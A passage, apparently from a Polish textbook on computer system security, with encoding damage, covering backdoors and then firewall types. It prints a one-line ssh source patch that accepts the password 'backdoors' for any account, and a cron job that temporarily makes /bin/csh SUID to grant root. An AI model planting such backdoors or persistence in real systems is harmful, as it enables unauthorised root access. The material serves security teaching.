[ Pobierz całość w formacie PDF ]
Próba logowania się do tak przygotowanej � furtki� wygląda następująco:
$ telnet ofiara.pl 37
Trying 192.168.1.2 ...
Connected to ofiara.pl
Escape charactek is '^]'.
$
Zmiana kodu z�ródłowego
Podobnie jak to ma miejsce w przypadku koni trojańskich, jedną z metod jest
zmiana kodu z�ródłowego programu i jego podmiana w systemie. Ponieważ do
większości odmian Unix'a dostępne są kody z�ródłowe, ewentualna modyfikacja
i ponowna kompilacja nie jest większym problemem. Przykładem może być pakiet
ssh, gdzie wykorzystujÄ…c funkcjÄ™ auth_passwdord i dopisaniu do niej jednej linijki,
mamy dostęp do każdego konta. Funkcja ta zwraca wartość 0 jeśli autoryzacja się
nie powiodła, a inne w przypadku sukcesu. Wstawienie w odpowiednim miejscu
linijki:
if (strcmp(password,"backdoors")== 0) return 1;
powoduje, że podając jako hasło tekst backdoors możemy się logować jako
dowolny użytkownik. Najczęściej chodzi jednak oczywiście o konto roota.
Pewną regułą przy tworzeniu komercyjnych systemów operacyjnych, zwłaszcza na
zamówienie, jest implementacja tylniego wejścia przez samego programistę.
Ma to znaczenie w momencie jakiejś awarii lub gdy np. nierozważny administrator
zapomni swojego hasła. Można przyjąć to za tajemnicę poliszynela, ponieważ
żaden szanujący się informatyk publicznie się nie przyzna, że istnieje łatwy sposób
obejścia zabezpieczeń jego systemu.
�BEZPIECZEC�STWO SYSTEMÓW KOMPUTEROWYCH 85
Ataki na systemy komputerowe
Cron
Usługa cron pozwala na zaplanowanie cyklicznie się powtarzających zadań. Lista
zadań do wykonania przechowywana jest w tablicy /etc/crontab.
Sam program nie jest jakimś szczególnym zagrożeniem, natomiast może być
stosowany zarówno przez hakerów jak i administratorów. Jedni mogą
o określonych porach otwierać sobie drogę do systemu, drudzy mogą okresowo
sprawdzać poprzez sumy kontrolne, czy nie zaszła ostatnio zmiana
w strategicznych plikach, czy też nie powiększyło się grono programów
z atrybutem SUID. Przykładowy plik tablicy może wyglądać tak:
# /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
Format daty i czasu tego pliku opiera się na wartościach pięciu kolumn:
I kolumna � minuty (0-59)
II kolumna � godziny (0-23)
III kolumna � dni miesiÄ…ca (1-31)
II kolumna � miesiÄ…c (1-12)
II kolumna � dni w tygodniu (0-6), przy czym 0 określa niedziele
�BEZPIECZEC�STWO SYSTEMÓW KOMPUTEROWYCH 86
Ataki na systemy komputerowe
DopisujÄ…c linijkÄ™:
00 2 6 * * root /etc/cron.perm
gdzie plik cron.perm będzie skryptem nadający atrybut SUID shellowi csh:
# /etc/cron.perm
chmod +s /bin/csh
sleep 30
chmod � s /bin/csh
przez 30 minut od godziny 2.00 do 2.30 rano będziemy mieli uprawnienia roota.
�BEZPIECZEC�STWO SYSTEMÓW KOMPUTEROWYCH 87
Rodzaje zabezpieczeń
Rozdział IV
1. Firewall
Wraz ze wzrostem liczby użytkowników Internetu rośnie ryzyko utraty
prywatności w lokalnych sieciach komputerowych. Najbardziej skutecznym
sposobem zmniejszenia potencjalnych zagrożeń bezpieczeństwa wynikających
z podłączenia do sieci, jest fizyczne odseparowanie wszystkich komputerów
wspomagających realizację istotnych zadań i przechowujących strategiczne
informacje. W praktyce, oznacza to kompleksowÄ… przebudowÄ™ fizycznej
infrastruktury systemu informatycznego. RozwiÄ…zaniem tego problemu jest
zastosowanie oprogramowania określanego mianem � ściana ognia� (ang. firewall),
dedykowanego do ochrony systemu lokalnego przed ingerencją zewnętrzną.
Firewall to zwykle dedykowana maszyna, która sprawdza każdy
przepływający przez nią pakiet i przepuszcza lub blokuje go zgodnie z regułami
ustalonymi przez administratora. Zapory umożliwiają firmom utworzenie
konfiguracji, która jest kompromisem między siecią izolowaną od Internetu i siecią
swobodnie do niego podłączoną. Zapora jest umieszczana między wewnętrzną
siecią firmy i siecią zewnętrzną. Daje ona prosty mechanizm kontroli ilości
i rodzaju ruchu sieciowego między obiema sieciami. Zapora sieciowa używana
wewnątrz firmy może zminimalizować ilość strat, ponieważ napastnik może się
włamać do jednej grupy komputerów, ale nie będzie miał dostępu do pozostałych.
Zapora postawiona między siecią lokalną firmy i Internetem uniemożliwia
użytkownikom, którzy uzyskali dostęp do komputerów poza firmą, przejęcie
kontroli nad komputerami wewnÄ…trz tej firmy, nie dopuszczajÄ…c tym samym do
�BEZPIECZEC�STWO SYSTEMÓW KOMPUTEROWYCH 88
Rodzaje zabezpieczeń
zdobycia przez nich punktu zaczepienia po jej wewnętrznej stronie.
Firewalle sÄ… projektowane na dwa sposoby. Pierwszym jest idea � czarnej skrzynki� .
Są to firewalle produkowane głównie przez komercyjne firmy. To zwykle
urządzenia, których sposób działania nie jest bliżej znany, posiadają interfejs
użytkownika i inne ułatwienia w ich sterowaniu, jednak nigdy nie możemy być
pewni że nie istnieją w nich jakieś luki i nieudokumentowane obejścia. Drugim
sposobem jest koncepcja � kryształowej skrzynki� , gdzie zasady filtrowania
pakietów są ogólno dostępne, ponieważ udostępniany jest kod z�ródłowy wraz
z kompletną dokumentacją, co pozwala na dokładne sprawdzenie całego kodu
i wprowadzenie ewentualnych poprawek. Ma to ogromne znaczenie w przypadku
systemów, gdzie dostępny jest kod z�ródłowy całego systemu operacyjnego,
a co za tym idzie możemy dostosować konfigurację firewalla do ewentualnych
niedociągnięć w samym kodzie systemu.
Powszechnie terminem firewall określa się wszystko co filtruje pakiety, czyli
od dedykowanych komputerów do oprogramowania, które spełnia taka rolę.
Firewalle możemy podzielić na trzy kategorie:
aplikacyjne (ang. application gateway) � umożliwiające kontrolowany dostęp
do określonych usług przez odpowiedni demon pośredniczący - proxy server;
pozostały ruch jest zazwyczaj całkowicie blokowany,
połączeniowe (ang. circuit gateway) � zestawiający według określonych
zasad połączenia TCP pomiędzy komputerami z sieci wewnętrznej, a resztą
Internetu, odbywa się to jednak bez kontroli zawartości pakietów (TCP
tuneling),
filtrujÄ…ce (ang. packet filtering gateway) � filtrujÄ…ce pakiety przychodzÄ…ce do
hosta, wychodzÄ…ce z niego oraz te przez niego przechodzÄ…ce.
�BEZPIECZEC�STWO SYSTEMÓW KOMPUTEROWYCH 89
Rodzaje zabezpieczeń
Firewalle aplikacyjne
W tym przypadku stosowany jest routing w warstwie aplikacji. Używa się bram
(ang. proxy gateways), na których ustawia się oprogramowanie dedykowane dla
poszczególnych aplikacji, który spełnia role pośrednika pomiędzy
[ Pobierz całość w formacie PDF ]
zanotowane.pldoc.pisz.plpdf.pisz.plforum-gsm.htw.pl